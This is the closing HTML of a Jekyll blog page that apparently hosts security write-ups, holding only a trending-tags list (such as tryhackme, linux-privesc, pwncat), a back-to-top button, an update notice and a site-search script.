    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux-privesc/">linux-privesc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/express/">express</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/pwncat/">pwncat</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/python/">python</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/asreproast/">asreproast</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

